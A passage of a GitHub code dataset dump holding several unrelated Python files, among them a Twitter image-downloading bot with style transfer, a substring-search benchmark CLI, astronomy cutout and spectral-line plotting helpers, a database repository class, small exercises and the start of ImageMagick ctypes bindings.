port=5000)\n","repo_name":"KamilKhairullin/Devops-course","sub_path":"app_python/myapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38147673542","text":"import tweepy\nimport pandas as pd\nimport wget\n\nimport os\nimport sys\nsys.path.append(\"fast-style-transfer/\")\nsys.path.append(\"fast-style-transfer/src\")\nfrom evaluate import ffwd_different_dimensions, ffwd\nfrom utils import list_files\nimport random\n\ndef authorize_twitter():\n auth = tweepy.OAuthHandler(os.getenv('consumer_token'), os.getenv('twitter_consumer_secret'))\n auth.set_access_token(os.getenv('twitter_key'),os.getenv('twitter_secret_key'))\n return tweepy.API(auth)\n\ndef getMilesTweets(dest_folder = 'images', registry = 'registry/downloaded_files.csv'):\n\n api = authorize_twitter()\n timeline = api.user_timeline(screen_name='@MilesSleeping')\n \n registryDF = pd.read_csv(registry)\n downloadedFiles = registryDF['file'].to_list()\n \n media_files = set()\n for status in timeline:\n media = status.entities.get('media',[])\n if(len(media) > 0):\n media_files.add((media[0]['media_url'],status.id))\n \n for media_file in media_files:\n fname = media_file[0]\n if fname not in downloadedFiles:\n print(f'downloading {fname}')\n wget.download(media_file[0],dest_folder)\n else:\n pass\n \n newFiles = pd.DataFrame(media_files, columns = ['file','tweet_id'])\n pd.concat([newFiles,registryDF]).drop_duplicates().to_csv(registry, index = False)\n return media_files\n\ndef random_style_transfer(in_path = 'images/', out_path = 'processed_images/', checkpoint_path = 'checkpoints', allow_different_dimensions = True, batch_size = 1, device = '/gpu:0'):\n checkpoints = list_files(checkpoint_path)\n files = [fname for fname in list_files(in_path) if fname not in list_files('processed_images/')]\n fullprocess = [(os.path.join(in_path,x),os.path.join(out_path,x),f'{checkpoint_path}/{random.sample(checkpoints,1)[0]}') for x in files]\n for tup in fullprocess:\n print(tup)\n if allow_different_dimensions:\n ffwd_different_dimensions([tup[0]], [tup[1]], tup[2], \n device_t=device, batch_size=batch_size)\n else :\n ffwd([tup[0]], [tup[1]], tup[2], device_t=device,\n batch_size=batch_size)","repo_name":"mj514316/miles_is_sleeping","sub_path":"miles_utils.py","file_name":"miles_utils.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12267153947","text":"import argparse\nimport json\nimport numpy as np\nimport os\n\nfrom algorithms import aho_corasick, boyer_moore_algorithm, bruteforce\nfrom algorithms import prefix_function, pythons_find, rabin_karp_algorithm\nfrom algorithms import z_function\nfrom data_loaders import data_best, data_amorotized\nfrom statisticians.simple_statiscian import Statiscian\n\n\ndef check_arguments_first_experiment(tests_count,\n algorithms_,\n substring,\n text_filename,\n maxlength,\n ):\n algorithms_conclusion = all([algorithm in globals()\n for algorithm in algorithms_])\n if 1 <= tests_count \\\n and algorithms_conclusion \\\n and len(substring) \\\n and os.path.isfile(text_filename) \\\n and 1 <= maxlength <= 100:\n return True\n print(\"Check failed\")\n return False\n\n\ndef check_arguments_second_experiment(tests_count,\n algorithms_,\n text_filename,\n substrings_filename,\n length,\n ):\n algorithms_conclusion = all([algorithm in globals()\n for algorithm in algorithms_])\n if 1 <= tests_count \\\n and algorithms_conclusion \\\n and os.path.isfile(text_filename) \\\n and os.path.isfile(substrings_filename) \\\n and 1 <= length:\n return True\n print(\"Check failed\")\n return False\n\n\ndef first_experiment(parsed_arguments):\n tests_count = parsed_arguments.c\n algorithms_names = parsed_arguments.a\n text_filename = parsed_arguments.t\n substring = parsed_arguments.substring\n maxlength = parsed_arguments.maxlength\n if check_arguments_first_experiment(\n tests_count,\n algorithms_names,\n substring,\n text_filename,\n maxlength,\n ):\n results_times = []\n results_memory = []\n all_data = list(data_best.generate(maxlength,\n substring,\n text_filename,\n sparce=5_000))\n for algorithm in algorithms_names:\n algorithm_tester = globals()[algorithm].performance_testing\n results_times_of_algorithm, results_memory_of_algorithm, _ = \\\n algorithm_tester(all_data,\n tests_count,\n )\n results_times.append(np.array(results_times_of_algorithm))\n results_memory.append(np.array(results_memory_of_algorithm))\n return results_times, results_memory\n\n\ndef preparation_for_second_experiment(substrings_filename: str,\n text_filename: str,\n length: int):\n with open(text_filename) as fin:\n text = fin.read()[:length]\n with open(substrings_filename) as fin_substrings:\n for i, substring in enumerate(fin_substrings.readlines()):\n substring = substring.strip()\n save_dir = os.path.dirname(substrings_filename)\n out_filename = os.path.join(save_dir, f'substring_{i}')\n if not os.path.isfile(out_filename):\n occurences, _ = bruteforce.bruteforce(substring, text)\n with open(out_filename, 'w') as fout:\n json.dump({\n \"substring_length\": len(substring),\n \"count_of_occurences\": len(occurences),\n \"occurences\": occurences,\n }, fout)\n\n\ndef second_experiment(parsed_arguments):\n tests_count = parsed_arguments.c\n algorithms_names = parsed_arguments.a\n text_filename = parsed_arguments.t\n substrings_filename = parsed_arguments.substrings_filename\n length = parsed_arguments.length\n if check_arguments_second_experiment(\n tests_count,\n algorithms_names,\n text_filename,\n substrings_filename,\n length,\n ):\n preparation_for_second_experiment(\n substrings_filename,\n text_filename,\n length,\n )\n results_times = []\n results_memory = []\n all_data = list(data_amorotized.generate(substrings_filename,\n text_filename))\n for algorithm in algorithms_names:\n algorithm_tester = globals()[algorithm].performance_testing\n results_times_of_algorithm, results_memory_of_algorithm, _ = \\\n algorithm_tester(all_data,\n tests_count,\n )\n results_times.append(np.array(results_times_of_algorithm))\n results_memory.append(np.array(results_memory_of_algorithm))\n return results_times, results_memory\n\n\ndef create_parser():\n parser = argparse.ArgumentParser(\n description='CLI manager of the experiments executing.',\n add_help=True)\n parser.add_argument('n', action='store', type=int,\n help=\"\"\"number of the experiment.\n In current version supported only '1' or '2'\"\"\")\n parser.add_argument('c', action='store', type=int,\n help=\"\"\"how many times per algorithm experiment runs.\n As a result returned mean\"\"\")\n parser.add_argument('t', action='store',\n help=\"path to text\")\n parser.add_argument('-a', action='append', default=[\"pythons_find\"],\n help=\"\"\"a tested algorithm,\n which will be added to the list\"\"\")\n parser.add_argument('-l', action='store', dest=\"length\", type=int,\n help=\"maximum text length\")\n parser.add_argument('-s', action='store', dest=\"substring\",\n help=\"substring to search\")\n parser.add_argument('-m', action='store', dest=\"maxlength\", type=int,\n help=\"maximum percentage of text that can be selected\")\n parser.add_argument('-S', action='store', dest=\"substrings_filename\",\n help=\"path to substrings file\")\n parser.add_argument('--version', action='version',\n version='%(prog)s 0.2.0')\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n parsed_args = parser.parse_args()\n experiments_list = [first_experiment, second_experiment]\n if 1 <= parsed_args.n <= len(experiments_list):\n results_times, result_memory = \\\n experiments_list[parsed_args.n - 1](parsed_arguments=parsed_args)\n statiscian = Statiscian()\n if parsed_args.n == 1:\n config = {\n 'usages': {\n 'memory_usage': result_memory,\n 'running_times': results_times,\n },\n 'algorithms_names': parsed_args.a,\n 'x_label_': \"Length of input text, letters\",\n }\n statiscian.complete_statistic(config)\n elif parsed_args.n == 2:\n dir_name = os.path.dirname(parsed_args.substrings_filename)\n length_list = []\n occurences_list = []\n for substring_file in os.listdir(dir_name):\n if substring_file.startswith(\"substring_\"):\n with open(\n os.path.join(dir_name, substring_file),\n 'r',\n ) as fin:\n data = json.load(fin)\n length_list.append(data[\"substring_length\"])\n occurences_list.append(data[\"count_of_occurences\"])\n occurences_list = sorted(occurences_list,\n key=lambda x:\n length_list[occurences_list.index(x)])\n length_list.sort()\n statiscian.make_tables_time_by_many_strings(\n runing_times=np.mean(results_times, axis=2),\n occurences=occurences_list,\n substrings_lengths=length_list,\n algorithms=parsed_args.a\n )\n statiscian.make_tables_memory_by_many_strings(\n memory_usage=np.mean(result_memory, axis=2),\n occurences=occurences_list,\n substrings_lengths=length_list,\n algorithms=parsed_args.a,\n )\n","repo_name":"Vl4d1sl0veZ4r1p0v/SubstingSearchEx","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":8677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16432161655","text":"\"\"\"\nThis module consists of different plotting-related functions, \nincluding getting image cutouts and plotting them.\nIt consists of following functions:\n 1. get_image_cutout (ra_in, dec_in, **kwargs)\n 2. get_multiple_image_cutouts (ra_in, dec_in, **kwargs)\n 3. get_multiwavelength_cutouts (ra_in, dec_in, **kwargs)\n 4. plot_cutouts (imgs, Nplotmax)\n 5. add_lines (z, **kwargs)\n \nAuthor : Ragadeepika Pucha\nVersion : 2022 June 21\n\"\"\"\n\n####################################################################################################\n####################################################################################################\n\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle\nfrom matplotlib.backends import backend_pdf as pdf\n\nfrom astropy.table import Table\nfrom astropy.utils.data import download_file\n\nfrom urllib.error import HTTPError\n\n####################################################################################################\n####################################################################################################\n\ndef get_image_cutout(ra_in, dec_in, layername = 'ls-dr9', pixel_scale = 0.262, cutout_size = 60.):\n \"\"\"\n Function to get the image cutout from a given survey.\n Getting images for each of these surveys require a layername.\n To be consistent, we want to show the pixel scales to be similar to the ones from the survey.\n List of layernames and pixel scales for the surveys - \n - GALAX - 'galex' - 1.5\"/pixel\n - SDSS - 'sdss' - 0.396\"/pixel\n - LS DR9 - 'ls-dr9' - 0.262\"/pixel\n - WISE W1/W2 - 'unwise-neo6' - 2.75\"/pixel\n - VLASS - 'vlass1.2' - 1.0\"/pixel\n \n Parameters\n ----------\n ra_in, dec_in : float, float\n Coordinates of the sky location for the image cutout\n \n layername : str\n String that leads to the url of the survey\n \n pixel_scale : float\n Pixel scale for the given survey in arcseconds per pixel\n \n cutout_size : float\n Size of the cutout. Default = 60\" (1 arc-minute in size)\n This is used along with the pixel_scale, to calculate the number of pixels.\n Note - The number of pixels is rounded to the nearest integer. \n The final cutout size is approximately may not be the exact input value, but close to it\n \n Returns\n -------\n img : 2d array\n Array containing the image cutout\n \"\"\"\n \n pixels = cutout_size/pixel_scale\n cutout_url = 'http://legacysurvey.org/viewer/jpeg-cutout/?ra=%.6f&dec=%.6f&layer='\\\n %(ra_in,dec_in)+layername+'&pixscale=%g&size=%d'%(pixel_scale, pixels)\n try:\n img = plt.imread(download_file(cutout_url,cache=False,show_progress=False,timeout=120))\n except HTTPError as e:\n if (e.code == 500):\n img = np.zeros((int(pixels), int(pixels),3))\n \n return (img)\n\n####################################################################################################\n####################################################################################################\n\ndef get_multiple_image_cutouts(ra_in, dec_in, layername = 'ls-dr9', \\\n pixel_scale = 0.262, cutout_size = 20.):\n \"\"\"\n Function to get multiple image cutouts from a given survey.\n Getting images for each of these surveys require a layername.\n To be consistent, we want to show the pixel scales to be similar to the ones from the survey.\n List of layernames and pixel scales for the surveys - \n - GALAX - 'galex' - 1.5\"/pixel\n - SDSS - 'sdss' - 0.396\"/pixel\n - LS DR9 - 'ls-dr9' - 0.262\"/pixel\n - WISE W1/W2 - 'unwise-neo6' - 2.75\"/pixel\n - VLASS - 'vlass1.2' - 1.0\"/pixel\n \n Parameters\n ----------\n \n ra_in, dec_in : float, float\n Coordinates of the sky location for the image cutout\n \n layername : str\n String that leads to the url of the survey\n \n pixel_scale : float\n Pixel scale for the given survey in arcseconds per pixel\n \n cutout_size : float\n Size of the cutout. Default = 20\"\n This is used along with the pixel_scale, to calculate the number of pixels.\n Note - The number of pixels is rounded to the nearest integer. \n The final cutout size is approximately may not be the exact input value, but close to it.\n \n Returns\n -------\n imgs : list\n List of image cutouts of the input targets\n\n \"\"\"\n imgs = []\n \n N = len(ra_in)\n \n for ii in range(N):\n img = get_image_cutout(ra_in[ii], dec_in[ii], layername = layername, \\\n pixel_scale = pixel_scale, cutout_size = cutout_size)\n imgs.append(img)\n \n return (imgs)\n\n####################################################################################################\n####################################################################################################\n\ndef get_multiwavelength_cutouts(ra_in, dec_in, cutout_size = 60.):\n \"\"\"\n Function to get the list of image cutouts in order - 'GALEX', 'LS DR9', 'WISE', 'VLASS'\n Getting images for each of these surveys require a layername.\n To be consistent, we want to show the pixel scales to be similar to the ones from the survey.\n List of layernames and pixel scales for the surveys - \n - GALAX - 'galex' - 1.5\"/pixel\n - LS DR9 - 'ls-dr9' - 0.262\"/pixel\n - WISE W1/W2 - 'unwise-neo6' - 2.75\"/pixel\n - VLASS - 'vlass1.2' - 1.0\"/pixel\n \n Parameters\n ----------\n \n ra_in, dec_in : float, float\n Coordinates of the sky location for the image cutouts\n \n cutout_size : float\n The size of the cutout. Defualt = 60\" (1 arc-minute in size)\n This is used along with the pixel_scale, to calculate the number of pixels.\n Note - The number of pixels is rounded to the nearest integer. \n The final cutout size is approximately may not be the exact input value, but close to it.\n \n Returns\n -------\n \n imgs : list\n List of image cutouts in order - 'GALEX', 'LS DR9', 'WISE', 'VLASS'\n \"\"\"\n \n imgs = []\n \n layernames = np.array(['galex', 'ls-dr9', 'unwise-neo6', 'vlass1.2'])\n pixel_scales = np.array([1.5, 0.262, 2.75, 1.0])\n pixels = cutout_size/pixel_scales\n \n for index, layername in enumerate(layernames):\n img = get_image_cutout(ra_in, dec_in, layername = layername, \\\n pixel_scale = pixel_scales[index], cutout_size = cutout_size)\n imgs.append(img)\n \n return (imgs)\n\n####################################################################################################\n####################################################################################################\n\ndef plot_cutouts(imgs, Nplotmax = 80):\n \"\"\"\n Function to plot a list of given image cutouts\n \n Parameters\n ----------\n imgs : list\n List of image cutouts to plot\n Nplotmax : int\n Maximum Number of image cutouts to plot from the given list. Default = 40\n \n \"\"\"\n \n N = min([len(imgs), Nplotmax])\n Nrow = int(N/8) + 1\n \n fig = plt.figure(figsize = (16, 2*Nrow))\n \n for ii in range(N):\n ax = fig.add_subplot(Nrow, 8, ii+1)\n ax.imshow(imgs[ii])\n ax.set(xticks = [], yticks = [])\n \n plt.tight_layout()\n plt.close()\n \n return (fig)\n\n####################################################################################################\n####################################################################################################\n\ndef add_lines(z, ax = None, rest_frame = True, em_label = True,\\\n abs_label = True, em_lines = None, abs_lines = None):\n \"\"\"\n Function to add emission and/or absorption lines onto a plot. \n \n If em_lines or abs_lines is given, plotting only the specified lines.\n If no lines are given, plotting all the lines that are present in x-range of the plot.\n \n Parameters\n ----------\n z : float\n Redshift value of the source\n \n ax : AxesSubplot\n The axis onto which the emission/absoption lines needs to be plotted.\n If ax = None, then the plotting function uses plt, rather than axis.\n \n rest_frame : bool\n Whether or not the plot is in rest-frame. Default is True.\n \n em_label : bool\n Whether or not to label the emission lines. Default is True.\n \n abs_label : bool\n Whether or not to label the absorption lines. Default is True.\n \n em_lines : list\n List of emission lines to label\n \n abs_lines : list\n List of absorption lines to label\n \n Returns\n -------\n None\n \n \"\"\"\n \n # List of lines\n # This is the set of emission lines from the spZline files. \n # All the wavelengths are in vaccuum wavelengths.\n\n # Emission Lines\n emission_lines = [\n {\"name\" : \"Ly-alpha\", \"lambda\" : 1215.67, \"emission\": True, \"label\" : \"Ly$\\\\alpha$\"},\n {\"name\" : \"N V 1240\", \"lambda\" : 1240.81, \"emission\": True, \"label\" : \"N V\"},\n {\"name\" : \"C IV 1549\", \"lambda\" : 1549.48, \"emission\": True, \"label\" : \"C IV\" },\n {\"name\" : \"He II 1640\", \"lambda\" : 1640.42, \"emission\": True, \"label\" : \"He II\"},\n {\"name\" : \"C III] 1908\", \"lambda\" : 1908.734, \"emission\": True, \"label\" : \"C III]\"},\n {\"name\" : \"Mg II 2799\", \"lambda\" : 2800.315, \"emission\": True, \"label\" : \"Mg II\" },\n {\"name\" : \"[O II] 3725\", \"lambda\" : 3727.092, \"emission\": True, \"label\" : \" \"},\n {\"name\" : \"[O II] 3727\", \"lambda\" : 3729.875, \"emission\": True, \"label\" : \"[O II]\"}, \n {\"name\" : \"[Ne III] 3868\", \"lambda\" : 3869.857, \"emission\": True, \"label\" : \"[Ne III]\"},\n {\"name\" : \"H-zeta\", \"lambda\" : 3890.151, \"emission\": True, \"label\" : \"H$\\\\zeta$\"},\n {\"name\" : \"[Ne III] 3970\", \"lambda\" : 3971.123, \"emission\": True, \"label\" : \"[Ne III]\"},\n {\"name\" : \"H-epsilon\", \"lambda\" : 3971.195, \"emission\": True, \"label\" : \"H$\\\\epsilon$\"}, \n {\"name\" : \"H-delta\", \"lambda\" : 4102.892, \"emission\": True, \"label\" : \"H$\\\\delta$\"},\n {\"name\" : \"H-gamma\", \"lambda\" : 4341.684, \"emission\": True, \"label\" : \"H$\\\\gamma$\"},\n {\"name\" : \"[O III] 4363\", \"lambda\" : 4364.435, \"emission\": True, \"label\" : \"[O III]\"},\n {\"name\" : \"He II 4685\", \"lambda\" : 4686.991, \"emission\": True, \"label\" : \"He II\"},\n {\"name\" : \"H-beta\", \"lambda\" : 4862.683, \"emission\": True, \"label\" : \"H$\\\\beta$\"},\n {\"name\" : \"[O III] 4959\", \"lambda\" : 4960.294, \"emission\": True, \"label\" : \"[O III]\" },\n {\"name\" : \"[O III] 5007\", \"lambda\" : 5008.239, \"emission\": True, \"label\" : \"[O III]\" },\n {\"name\" : \"He II 5411\", \"lambda\" : 5413.025, \"emission\": True, \"label\" : \"He II\"},\n {\"name\" : \"[O I] 5577\", \"lambda\" : 5578.888, \"emission\": True, \"label\" : \"[O I]\" },\n {\"name\" : \"[N II] 5755\", \"lambda\" : 5756.186, \"emission\": True, \"label\" : \"[Ne II]\" },\n {\"name\" : \"He I 5876\", \"lambda\" : 5877.308, \"emission\": True, \"label\" : \"He I\" },\n {\"name\" : \"[O I] 6300\", \"lambda\" : 6302.046, \"emission\": True, \"label\" : \"[O I]\" },\n {\"name\" : \"[S III] 6312\", \"lambda\" : 6313.806, \"emission\": True, \"label\" : \"[S III]\" },\n {\"name\" : \"[O I] 6363\", \"lambda\" : 6365.535, \"emission\": True, \"label\" : \"[O I]\" },\n {\"name\" : \"[N II] 6548\", \"lambda\" : 6549.859, \"emission\": True, \"label\" : \"[N II]\" },\n {\"name\" : \"H-alpha\", \"lambda\" : 6564.614, \"emission\": True, \"label\" : \"H$\\\\alpha$\" },\n {\"name\" : \"[N II] 6583\", \"lambda\" : 6585.268, \"emission\": True, \"label\" : \"[N II]\" },\n {\"name\" : \"[S II] 6716\", \"lambda\" : 6718.294, \"emission\": True, \"label\" : \"[S II]\" },\n {\"name\" : \"[S II] 6730\", \"lambda\" : 6732.678, \"emission\": True, \"label\" : \"[S II]\" },\n {\"name\" : \"[Ar III] 7135\", \"lambda\" : 7137.758, \"emission\": True, \"label\" : \"[Ar III]\" },]\n\n\n # Absorption lines\n absorption_lines = [\n {\"name\" : \"H12\", \"lambda\" : 3751.22, \"emission\": False, \"label\" : \"H12\"},\n {\"name\" : \"H11\", \"lambda\" : 3771.70, \"emission\": False, \"label\" : \"H11\"},\n {\"name\" : \"H10\", \"lambda\" : 3798.98, \"emission\": False, \"label\" : \"H10\"},\n {\"name\" : \"H9\", \"lambda\" : 3836.48, \"emission\": False, \"label\" : \"H9\"},\n {\"name\" : \"H-zeta\", \"lambda\" : 3890.151, \"emission\": False, \"label\" : \"H$\\\\zeta$\" },\n {\"name\" : \"K (Ca II 3933)\", \"lambda\" : 3934.814, \"emission\": False, \"label\" : \"K (Ca II)\"},\n {\"name\" : \"H (Ca II 3968)\", \"lambda\" : 3969.623, \"emission\": False, \"label\" : \"H (Ca II)\"},\n {\"name\" : \"H-epsilon\", \"lambda\" : 3971.195, \"emission\": False, \"label\" : \"H$\\\\epsilon$\"}, \n {\"name\" : \"H-delta\", \"lambda\" : 4102.892, \"emission\": False, \"label\" : \"H$\\\\delta$\" },\n {\"name\" : \"G (Ca I 4307)\", \"lambda\" : 4308.952, \"emission\": False, \"label\" : \"G (Ca I)\"},\n {\"name\" : \"H-gamma\", \"lambda\" : 4341.684, \"emission\": False, \"label\" : \"H$\\\\gamma$\"},\n {\"name\" : \"H-beta\", \"lambda\" : 4862.683, \"emission\": False, \"label\" : \"H$\\\\beta$\"},\n# {\"name\" : \"Mg I 5175\", \"lambda\" : 5176.441, \"emission\": False, \"label\" : \"Mg I\"},#Triplet\n {\"name\" : \"Mg I 5183\", \"lambda\" : 5185.048, \"emission\": False, \"label\" : \" \"},\n {\"name\" : \"Mg I 5172\", \"lambda\" : 5174.125, \"emission\": False, \"label\" : \" \"},\n {\"name\" : \"Mg I 5167\", \"lambda\" : 5168.762, \"emission\": False, \"label\" : \"Mg I\"},\n {\"name\" : \"D2 (Na I 5889)\", \"lambda\" : 5891.582, \"emission\": False, \"label\" : \" \" },\n {\"name\" : \"D1 (Na I 5895)\", \"lambda\" : 5897.554, \"emission\": False, \"label\" : \"D1,2 (Na I)\" },\n {\"name\" : \"H-alpha\", \"lambda\" : 6564.614, \"emission\": False, \"label\" : \"H$\\\\alpha$\"},\n ]\n \n if (ax == None):\n # If there is no axes given, plotting with the plt function\n ax = plt.gca()\n \n if (em_lines != None):\n # Choosing the emission lines listed by the user\n emission_lines = list(filter(lambda x: x['name'] in em_lines, emission_lines))\n \n if (abs_lines != None):\n # Choosing the absorption lines listed by the user\n absorption_lines = list(filter(lambda x: x['name'] in abs_lines, absorption_lines)) \n \n xbounds = ax.get_xbound() # Getting the x-range of the plot \n # This is for selecting only those lines that are visible in the x-range of the plot\n \n for ii in range(len(emission_lines)):\n # If rest_frame = False, \n # redshifting the emission lines to the observed frame of the source\n if (rest_frame == False):\n lam = emission_lines[ii]['lambda']*(1+z)\n else:\n lam = emission_lines[ii]['lambda']\n # Plotting the emission lines if they are within the x-range of the plot\n if (emission_lines[ii]['emission']) & (lam > xbounds[0]) & (lam < xbounds[1]):\n ax.axvline(lam, 0.95, 1.0, color = 'k', lw = 1.0)\n ax.axvline(lam, color = 'k', lw = 1.0, linestyle = ':')\n trans = ax.get_xaxis_transform()\n if (em_label == True):\n # Labeling the emission lines if em_label = True\n ax.annotate(emission_lines[ii]['label'], xy = (lam, 1.05), xycoords = trans, \\\n fontsize = 22, rotation = 90, color = 'k')\n \n for ii in range(len(absorption_lines)):\n # If rest_frame = False,\n # redshifting the absorption lines to the observed frame of the source\n if (rest_frame == False):\n lam = absorption_lines[ii]['lambda']*(1+z)\n else:\n lam = absorption_lines[ii]['lambda']\n # Plotting the absorption lines if they are within the x-range of the plot\n if (lam > xbounds[0]) & (lam < xbounds[1]):\n ax.axvline(lam, 0.2, 1.0, color = 'r', lw = 1.0, linestyle = ':')\n trans = ax.get_xaxis_transform()\n if (abs_label == True):\n # Labeling the absorption lines if abs_label = True\n ax.annotate(absorption_lines[ii]['label'], xy = (lam, 0.05), xycoords = trans, \\\n fontsize = 16, rotation = 90, color = 'r')\n\n####################################################################################################\n####################################################################################################","repo_name":"Ragadeepika-Pucha/DESI_Functions","sub_path":"py/plotting_functions.py","file_name":"plotting_functions.py","file_ext":"py","file_size_in_byte":16439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6627246150","text":"from data_storages.db.core import DatabaseManager\nfrom data_storages.db.models import LessonWithAbsentChildren\n\n\nclass LessonWithAbsentChildrenRepository:\n @staticmethod\n def save(lesson_id, topic, room_num, start_date, start_time, group_id, group_name):\n\n with DatabaseManager.get_db() as session:\n lesson = LessonWithAbsentChildren(\n lesson_id=lesson_id,\n topic=topic,\n room_num=room_num,\n start_date=start_date,\n start_time=start_time,\n group_id=group_id,\n group_name=group_name,\n )\n session.add(lesson)\n session.commit()\n\n @staticmethod\n def delete_by_lesson_id(lesson_id):\n with DatabaseManager.get_db() as session:\n lesson = session.query(LessonWithAbsentChildren).filter_by(lesson_id=lesson_id).first()\n if lesson:\n session.delete(lesson)\n session.commit()\n\n @staticmethod\n def find_by_group_id_and_room_num_and_date(group_id, room_num, date):\n with DatabaseManager.get_db() as session:\n lessons = session.query(LessonWithAbsentChildren).filter(\n LessonWithAbsentChildren.group_id == group_id,\n LessonWithAbsentChildren.room_num == room_num,\n LessonWithAbsentChildren.start_date == date\n ).all()\n\n return lessons\n\n\n @staticmethod\n def find_all():\n with DatabaseManager.get_db() as session:\n lessons = session.query(LessonWithAbsentChildren).all()\n return lessons","repo_name":"stylebyhedgehog/supra-helper-bot","sub_path":"data_storages/db/repositories/lesson_with_absent_child_repository.py","file_name":"lesson_with_absent_child_repository.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31801616534","text":"\"\"\"\nReview Question 16\nParse a binary number to a decimal integer\n\"\"\"\n\n\ndef bin_to_dec(string):\n result = 0\n n = len(string)\n for i in range(n):\n result += int(string[i]) * (2 ** (n - i - 1))\n return result\n\n\ndef main():\n binary = input(\"Enter binary number\\n\")\n result = bin_to_dec(binary)\n\n print(f\"{binary} as decimal is {result}\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions","sub_path":"Chapter05/0022_rev16_binary_to_decimal.py","file_name":"0022_rev16_binary_to_decimal.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8826678959","text":"import tkinter as tk\nfrom gameBoardSubsystem.main import gameBoard\nfrom dbSubsystem.main import dbSubsystem\nfrom displaySubsystem.main import *\n\ndef create_checkbox_grid(rows, cols, w):\n checkbox_grid = []\n for i in range(rows):\n row = []\n for j in range(cols):\n var = tk.BooleanVar()\n checkbox = tk.Checkbutton(w, variable=var)\n checkbox.grid(row=i+1, column=j)\n row.append(var)\n checkbox_grid.append(row)\n return checkbox_grid\n\ndef launchwithconf(name):\n new_window = tk.Tk()\n new_window.title(f'inferno_launchconf -- configuring \\'{name}\\'...')\n\n label = tk.Label(new_window, text=\"Configure your new game instance: \")\n label.grid(row=0, columnspan=8)\n checkbox_grid = create_checkbox_grid(7, 8, new_window)\n button = tk.Button(new_window, text=\"LAUNCH\", command=(lambda: launch(new_window, name, board=[[int(j.get()) for j in i] for i in checkbox_grid])))\n button.grid(row=8, columnspan=8)\n\n new_window.mainloop()\n\n\ndef prelaunch():\n name = text_input.get()\n dbs = dbSubsystem()\n if dbs.retrieveGame(name):\n launch(root, name)\n else:\n root.destroy() \n launchwithconf(name) \n\ndef launch(w, name, board=False):\n w.destroy()\n print('launch called')\n gb = gameBoard(name, board)\n gb.save()\n masterDSub = DisplaySubsystem(512,512,\"inferno\",'inferno', gb)\n masterDSub.run()\n\n\n\nroot = tk.Tk()\nroot.title(\"inferno_prelaunchassistant\")\n\nlabel = tk.Label(root, text=\"Create/Retrieve board\")\nlabel.pack()\n\nlabel = tk.Label(root, text=\"Board name? \")\nlabel.pack()\n\ntext_input = tk.Entry(root)\ntext_input.pack()\n\nbutton = tk.Button(root, text=\"LAUNCH\", command=prelaunch)\nbutton.pack()\n\nroot.mainloop()","repo_name":"SumukhPrasad/CS-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13466283321","text":"## 미로 탐색\n\nimport sys\n\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\n\nmatrix = [input().rstrip() for _ in range(n)]\nvisit = [[0] * m for _ in range(n)]\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nqueue = [[0, 0]]\nvisit[0][0] = 1\n\nwhile queue:\n x, y = queue.pop(0)\n\n if x == n - 1 and y == m - 1:\n print(visit[x][y])\n break\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if visit[nx][ny] == 0 and matrix[nx][ny] == \"1\":\n visit[nx][ny] = visit[x][y] + 1\n queue.append([nx, ny])","repo_name":"yejiiha/BaekJoon_step","sub_path":"DFS and BFS/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19517744985","text":"\n__all__ = [\n 'SegmentInfo',\n 'AffineMatrix',\n 'GradientInfo',\n ]\n\nimport ctypes\nfrom magickpy.image import Image\nfrom magickpy.types import RectangleInfo, PixelPacket\nfrom magickpy.enums import CompositeOp\nfrom magickpy.util import wrap_ptr_class\nfrom magickpy import lib\n\nclass SegmentInfo(ctypes.Structure):\n _fields_ = [\n ('x1', ctypes.c_double),\n ('y1', ctypes.c_double),\n ('x2', ctypes.c_double),\n ('y2', ctypes.c_double),\n ]\n\nclass AffineMatrix(ctypes.Structure):\n _fields_ = [\n ('sx', ctypes.c_double),\n ('rx', ctypes.c_double),\n ('ry', ctypes.c_double),\n ('sy', ctypes.c_double),\n ('tx', ctypes.c_double),\n ('ty', ctypes.c_double),\n ]\n\nclass GradientInfo(ctypes.Structure):\n _fields_ = [\n ('type', ctypes.c_int),\n ('bounding_box', RectangleInfo),\n ('gradient_vector', SegmentInfo),\n ('stops', ctypes.c_void_p),\n ('number_stops', ctypes.c_ulong),\n ('spread', ctypes.c_int),\n ('debug', ctypes.c_int),\n ('signature', ctypes.c_ulong),\n ]\n def __new__(self):\n raise NotImplementedError\n\nclass ElementReference(ctypes.Structure):\n def __new__(self):\n raise NotImplementedError\nElementReference._fields_ = [\n ('id', ctypes.c_char_p),\n ('type', ctypes.c_int),\n ('gradient', GradientInfo),\n ('signature', ctypes.c_ulong),\n ('previous', ctypes.POINTER(ElementReference)),\n ('next', ctypes.POINTER(ElementReference)),\n ]\n\nclass _DrawInfo(ctypes.Structure):\n _fields_ = [\n ('primitive', ctypes.c_char_p),\n ('geometry', ctypes.c_char_p),\n ('viewbox', RectangleInfo),\n ('affine', AffineMatrix),\n ('gravity', ctypes.c_int),\n 